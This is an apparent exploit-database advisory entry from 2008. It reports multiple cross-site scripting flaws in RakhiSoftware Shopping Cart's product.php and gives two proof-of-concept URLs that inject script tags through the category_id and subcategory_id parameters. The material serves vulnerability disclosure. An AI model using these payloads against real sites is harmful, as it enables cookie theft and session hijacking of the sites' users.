RakhiSoftware Shopping Cart - 'product.php' Multiple Cross-Site Scripting Vulnerabilities

EDB-ID:

32607




Platform:

PHP

Date:

2008-11-28


source: https://www.securityfocus.com/bid/32563/info

RakhiSoftware Shopping Cart is prone to multiple remote vulnerabilities.

Exploiting these issues can allow attackers to obtain sensitive information, steal cookie data, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1

http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script>